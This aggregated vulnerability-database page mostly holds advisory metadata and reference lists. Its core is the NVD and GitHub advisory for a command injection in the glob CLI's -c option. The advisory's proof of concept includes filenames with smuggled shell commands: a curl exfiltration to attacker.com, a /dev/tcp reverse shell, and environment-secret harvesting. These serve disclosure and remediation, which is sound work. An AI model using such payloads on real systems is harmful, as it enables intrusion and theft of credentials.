"url": "https://osv.dev/vulnerability/CVE-2026-28292"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32141"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33036"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-23c5-xmqv-rm74"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-25h7-pfq9-p65f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2mjp-6q6p-2qxm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-34x7-hfp2-rc4v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-37qj-frw5-hhjh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-38c4-r59v-3vqw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3ppc-4f35-3m26"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4992-7rv2-5pvq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5j98-mcp5-4vw2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-73rr-hh4g-fpgx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7h2j-956f-4vf2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7r86-cg39-jmmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-83g3-92jg-28cx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8qq5-rm4j-mr97"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8wc6-vgrq-x6cf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9ppj-qmqm-q256"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f269-vfmq-vjvj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fj3w-jwp8-x2g3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jmr7-xgp7-cmfj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m7jm-9gc2-mpf2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-phc3-fgpg-7m6h"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qffp-2rhf-9h96"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qpx9-hpmf-5gmw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r275-fr43-pm7q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r6q2-hw4h-h46w"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v9p9-hfj2-hcw8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vrm6-8vpv-qv8q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w7fw-mjwx-w883"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1527"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2327"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2391"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25128"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25547"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2581"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28292"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-64756, CVE-2025-69873, CVE-2026-1525, CVE-2026-1526, CVE-2026-1527, CVE-2026-1528, CVE-2026-2229, CVE-2026-2327, CVE-2026-23745, CVE-2026-2391, CVE-2026-24842, CVE-2026-25128, CVE-2026-25547, CVE-2026-2581, CVE-2026-25896, CVE-2026-26278, CVE-2026-26960, CVE-2026-27601, CVE-2026-27903, CVE-2026-27904, CVE-2026-27942, CVE-2026-28292, CVE-2026-29786, CVE-2026-31802, CVE-2026-32141, CVE-2026-33036, ghsa-23c5-xmqv-rm74, ghsa-25h7-pfq9-p65f, ghsa-2g4f-4pwh-qvx6, ghsa-2mjp-6q6p-2qxm, ghsa-34x7-hfp2-rc4v, ghsa-37qj-frw5-hhjh, ghsa-38c4-r59v-3vqw, ghsa-3ppc-4f35-3m26, ghsa-4992-7rv2-5pvq, ghsa-5j98-mcp5-4vw2, ghsa-73rr-hh4g-fpgx, ghsa-7h2j-956f-4vf2, ghsa-7r86-cg39-jmmj, ghsa-83g3-92jg-28cx, ghsa-8gc5-j5rx-235r, ghsa-8qq5-rm4j-mr97, ghsa-8wc6-vgrq-x6cf, ghsa-9ppj-qmqm-q256, ghsa-f269-vfmq-vjvj, ghsa-fj3w-jwp8-x2g3, ghsa-jmr7-xgp7-cmfj, ghsa-m7jm-9gc2-mpf2, ghsa-phc3-fgpg-7m6h, ghsa-qffp-2rhf-9h96, ghsa-qpx9-hpmf-5gmw, ghsa-r275-fr43-pm7q, ghsa-r6q2-hw4h-h46w, ghsa-v9p9-hfj2-hcw8, ghsa-vrm6-8vpv-qv8q, ghsa-w7fw-mjwx-w883 applied in versions: 43.4.4-r0",
"upstream": [
"CVE-2025-64756",
"CVE-2025-69873",
"CVE-2026-1525",
"CVE-2026-1526",
"CVE-2026-1527",
"CVE-2026-1528",
"CVE-2026-2229",
"CVE-2026-2327",
"CVE-2026-23745",
"CVE-2026-2391",
"CVE-2026-24842",
"CVE-2026-25128",
"CVE-2026-25547",
"CVE-2026-2581",
"CVE-2026-25896",
"CVE-2026-26278",
"CVE-2026-26960",
"CVE-2026-27601",
"CVE-2026-27903",
"CVE-2026-27904",
"CVE-2026-27942",
"CVE-2026-28292",
"CVE-2026-29786",
"CVE-2026-31802",
"CVE-2026-32141",
"CVE-2026-33036",
"ghsa-23c5-xmqv-rm74",
"ghsa-25h7-pfq9-p65f",
"ghsa-2g4f-4pwh-qvx6",
"ghsa-2mjp-6q6p-2qxm",
"ghsa-34x7-hfp2-rc4v",
"ghsa-37qj-frw5-hhjh",
"ghsa-38c4-r59v-3vqw",
"ghsa-3ppc-4f35-3m26",
"ghsa-4992-7rv2-5pvq",
"ghsa-5j98-mcp5-4vw2",
"ghsa-73rr-hh4g-fpgx",
"ghsa-7h2j-956f-4vf2",
"ghsa-7r86-cg39-jmmj",
"ghsa-83g3-92jg-28cx",
"ghsa-8gc5-j5rx-235r",
"ghsa-8qq5-rm4j-mr97",
"ghsa-8wc6-vgrq-x6cf",
"ghsa-9ppj-qmqm-q256",
"ghsa-f269-vfmq-vjvj",
"ghsa-fj3w-jwp8-x2g3",
"ghsa-jmr7-xgp7-cmfj",
"ghsa-m7jm-9gc2-mpf2",
"ghsa-phc3-fgpg-7m6h",
"ghsa-qffp-2rhf-9h96",
"ghsa-qpx9-hpmf-5gmw",
"ghsa-r275-fr43-pm7q",
"ghsa-r6q2-hw4h-h46w",
"ghsa-v9p9-hfj2-hcw8",
"ghsa-vrm6-8vpv-qv8q",
"ghsa-w7fw-mjwx-w883"
]
}
FKIE_CVE-2025-64756
Vulnerability from fkie_nvd - Published: 2025-11-17 18:15 - Updated: 2025-12-02 19:34| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f | Patch | |
| security-advisories@github.com | https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146 | Patch | |
| security-advisories@github.com | https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2 | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:isaacs:glob:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3C8601DB-5326-473F-8AB9-6F66833AC884",
"versionEndExcluding": "10.5.0",
"versionStartIncluding": "10.2.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:isaacs:glob:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "F7828865-293E-4DB7-AC94-A3C1027E25A1",
"versionEndExcluding": "11.1.0",
"versionStartIncluding": "11.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0."
}
],
"id": "CVE-2025-64756",
"lastModified": "2025-12-02T19:34:43.270",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-11-17T18:15:58.270",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-5J98-MCP5-4VW2
Vulnerability from github – Published: 2025-11-17 17:38 – Updated: 2025-11-19 02:30Summary
The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.
Details
Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
Technical Flow:
1. User runs glob -c <command> <pattern>
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using shell: true
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
Affected Component:
- CLI Only: The vulnerability affects only the command-line interface
- Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
- Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)
Attack Surface:
- Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
- Any directory where attackers can control filenames (PR branches, archives, user uploads)
- CI/CD pipelines using glob -c on untrusted content
PoC
Setup Malicious File:
mkdir test_directory && cd test_directory
# Create file with command injection payload in filename
touch '$(touch injected_poc)'
Trigger Vulnerability:
# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
Result:
- The echo command executes normally
- Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
- A new file injected_poc is created, proving command execution
- Any command can be injected this way with full user privileges
Advanced Payload Examples:
Data Exfiltration:
# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
Reverse Shell:
# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
Environment Variable Harvesting:
# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
Impact
Arbitrary Command Execution: - Commands execute with full privileges of the user running glob CLI - No privilege escalation required - runs as current user - Access to environment variables, file system, and network
Real-World Attack Scenarios:
1. CI/CD Pipeline Compromise:
- Malicious PR adds files with crafted names to repository
- CI pipeline uses glob -c to process files (linting, testing, deployment)
- Commands execute in CI environment with build secrets and deployment credentials
- Potential for supply chain compromise through artifact tampering
2. Developer Workstation Attack:
- Developer clones repository or extracts archive containing malicious filenames
- Local build scripts use glob -c for file processing
- Developer machine compromise with access to SSH keys, tokens, local services
3. Automated Processing Systems: - Services using glob CLI to process uploaded files or external content - File uploads with malicious names trigger command execution - Server-side compromise with potential for lateral movement
4. Supply Chain Poisoning: - Malicious packages or themes include files with crafted names - Build processes using glob CLI automatically process these files - Wide distribution of compromise through package ecosystems
Platform-Specific Risks: - POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing - Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL - Mixed Environments: CI systems often use Linux containers regardless of developer platform
Affected Products
- Ecosystem: npm
- Package name: glob
- Component: CLI only (
src/bin.mts) - Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
- Introduced: v10.2.0 (first release with CLI containing
-c/--cmdoption) - Patched versions: 11.1.0and 10.5.0
Scope Limitation:
- Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
- CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable
Remediation
- Upgrade to
glob@10.5.0,glob@11.1.0, or higher, as soon as possible. - If any
globCLI actions fail, then convert commands containing positional arguments, to use the--cmd-arg/-goption instead. - As a last resort, use
--shellto maintainshell:truebehavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "glob"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.1.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "glob"
},
"ranges": [
{
"events": [
{
"introduced": "10.2.0"
},
{
"fixed": "10.5.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64756"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-17T17:38:56Z",
"nvd_published_at": "2025-11-17T18:15:58Z",
"severity": "HIGH"
},
"details": "### Summary\n\nThe glob CLI contains a command injection vulnerability in its `-c/--cmd` option that allows arbitrary command execution when processing files with malicious names. When `glob -c \u003ccommand\u003e \u003cpatterns\u003e` is used, matched filenames are passed to a shell with `shell: true`, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.\n\n### Details\n\n**Root Cause:**\nThe vulnerability exists in `src/bin.mts:277` where the CLI collects glob matches and executes the supplied command using `foregroundChild()` with `shell: true`:\n\n```javascript\nstream.on(\u0027end\u0027, () =\u003e foregroundChild(cmd, matches, { shell: true }))\n```\n\n**Technical Flow:**\n1. User runs `glob -c \u003ccommand\u003e \u003cpattern\u003e` \n2. CLI finds files matching the pattern\n3. Matched filenames are collected into an array\n4. Command is executed with matched filenames as arguments using `shell: true`\n5. Shell interprets metacharacters in filenames as command syntax\n6. Malicious filenames execute arbitrary commands\n\n**Affected Component:**\n- **CLI Only:** The vulnerability affects only the command-line interface\n- **Library Safe:** The core glob library API (`glob()`, `globSync()`, streams/iterators) is not affected\n- **Shell Dependency:** Exploitation requires shell metacharacter support (primarily POSIX systems)\n\n**Attack Surface:**\n- Files with names containing shell metacharacters: `$()`, backticks, `;`, `\u0026`, `|`, etc.\n- Any directory where attackers can control filenames (PR branches, archives, user uploads)\n- CI/CD pipelines using `glob -c` on untrusted content\n\n### PoC\n\n**Setup Malicious File:**\n```bash\nmkdir test_directory \u0026\u0026 cd test_directory\n\n# Create file with command injection payload in filename\ntouch \u0027$(touch injected_poc)\u0027\n```\n\n**Trigger Vulnerability:**\n```bash\n# Run glob CLI with -c option\nnode /path/to/glob/dist/esm/bin.mjs -c echo \"**/*\"\n```\n\n**Result:**\n- The echo command executes normally\n- **Additionally:** The `$(touch injected_poc)` in the filename is evaluated by the shell\n- A new file `injected_poc` is created, proving command execution\n- Any command can be injected this way with full user privileges\n\n**Advanced Payload Examples:**\n\n**Data Exfiltration:**\n```bash\n# Filename: $(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" \u003e /dev/null 2\u003e\u00261)\ntouch \u0027$(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" \u003e /dev/null 2\u003e\u00261)\u0027\n```\n\n**Reverse Shell:**\n```bash\n# Filename: $(bash -i \u003e\u0026 /dev/tcp/attacker.com/4444 0\u003e\u00261)\ntouch \u0027$(bash -i \u003e\u0026 /dev/tcp/attacker.com/4444 0\u003e\u00261)\u0027\n```\n\n**Environment Variable Harvesting:**\n```bash\n# Filename: $(env | grep -E \"(TOKEN|KEY|SECRET)\" \u003e /tmp/secrets.txt)\ntouch \u0027$(env | grep -E \"(TOKEN|KEY|SECRET)\" \u003e /tmp/secrets.txt)\u0027\n```\n\n### Impact\n\n**Arbitrary Command Execution:**\n- Commands execute with full privileges of the user running glob CLI\n- No privilege escalation required - runs as current user\n- Access to environment variables, file system, and network\n\n**Real-World Attack Scenarios:**\n\n**1. CI/CD Pipeline Compromise:**\n- Malicious PR adds files with crafted names to repository\n- CI pipeline uses `glob -c` to process files (linting, testing, deployment)\n- Commands execute in CI environment with build secrets and deployment credentials\n- Potential for supply chain compromise through artifact tampering\n\n**2. Developer Workstation Attack:**\n- Developer clones repository or extracts archive containing malicious filenames\n- Local build scripts use `glob -c` for file processing\n- Developer machine compromise with access to SSH keys, tokens, local services\n\n**3. Automated Processing Systems:**\n- Services using glob CLI to process uploaded files or external content\n- File uploads with malicious names trigger command execution\n- Server-side compromise with potential for lateral movement\n\n**4. Supply Chain Poisoning:**\n- Malicious packages or themes include files with crafted names\n- Build processes using glob CLI automatically process these files\n- Wide distribution of compromise through package ecosystems\n\n**Platform-Specific Risks:**\n- **POSIX/Linux/macOS:** High risk due to flexible filename characters and shell parsing\n- **Windows:** Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL\n- **Mixed Environments:** CI systems often use Linux containers regardless of developer platform\n\n### Affected Products\n\n- **Ecosystem:** npm\n- **Package name:** glob\n- **Component:** CLI only (`src/bin.mts`)\n- **Affected versions:** v10.2.0 through v11.0.3 (and likely later versions until patched)\n- **Introduced:** v10.2.0 (first release with CLI containing `-c/--cmd` option)\n- **Patched versions:** 11.1.0and 10.5.0\n\n**Scope Limitation:**\n- **Library API Not Affected:** Core glob functions (`glob()`, `globSync()`, async iterators) are safe\n- **CLI-Specific:** Only the command-line interface with `-c/--cmd` option is vulnerable\n\n### Remediation\n\n- Upgrade to `glob@10.5.0`, `glob@11.1.0`, or higher, as soon as possible.\n- If any `glob` CLI actions fail, then convert commands containing positional arguments, to use the `--cmd-arg`/`-g` option instead.\n- As a last resort, use `--shell` to maintain `shell:true` behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.",
"id": "GHSA-5j98-mcp5-4vw2",
"modified": "2025-11-19T02:30:52Z",
"published": "2025-11-17T17:38:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f"
},
{
"type": "WEB",
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
},
{
"type": "PACKAGE",
"url": "https://github.com/isaacs/node-glob"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "glob CLI: Command injection via -c/--cmd executes matches with shell:true"
}
ICSA-26-071-03
Vulnerability from csaf_cisa - Published: 2026-03-10 00:00 - Updated: 2026-03-12 06:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
SIDIS Prime
Siemens / SIDIS Prime
|
vers:intdot/<4.0.800 |
Vendor Fix
|
| URL | Category |
|---|---|
| https://cert-portal.siemens.com/productcert/csaf/… | self |
| https://cert-portal.siemens.com/productcert/html/… | self |
| https://raw.githubusercontent.com/cisagov/CSAF/de… | self |
| https://www.cisa.gov/news-events/ics-advisories/i… | self |
| https://www.cisa.gov/news-events/ics-alerts/ics-a… | external |
| https://www.cisa.gov/resources-tools/resources/ic… | external |
| https://www.cisa.gov/topics/industrial-control-systems | external |
| https://www.cisa.gov/sites/default/files/recommen… | external |
| https://www.cisa.gov/sites/default/files/publicat… | external |
| https://www.cisa.gov/news-events/news/targeted-cy… | external |
| https://www.cve.org/CVERecord?id=CVE-2024-29857 | external |
| https://cwe.mitre.org/data/definitions/125.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2024-30171 | external |
| https://cwe.mitre.org/data/definitions/203.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2024-30172 | external |
| https://cwe.mitre.org/data/definitions/20.html | external |
| https://www.cve.org/CVERecord?id=CVE-2024-41996 | external |
| https://cwe.mitre.org/data/definitions/295.html | external |
| https://www.cve.org/CVERecord?id=CVE-2025-6965 | external |
| https://cwe.mitre.org/data/definitions/197.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-7783 | external |
| https://cwe.mitre.org/data/definitions/330.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-9230 | external |
| https://cwe.mitre.org/data/definitions/787.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-9232 | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-9670 | external |
| https://cwe.mitre.org/data/definitions/1333.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-12816 | external |
| https://cwe.mitre.org/data/definitions/436.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-15284 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-58751 | external |
| https://cwe.mitre.org/data/definitions/22.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-58752 | external |
| https://cwe.mitre.org/data/definitions/23.html | external |
| https://www.cve.org/CVERecord?id=CVE-2025-58754 | external |
| https://cwe.mitre.org/data/definitions/770.html | external |
| https://www.cve.org/CVERecord?id=CVE-2025-62522 | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-64718 | external |
| https://cwe.mitre.org/data/definitions/1321.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-64756 | external |
| https://cwe.mitre.org/data/definitions/78.html | external |
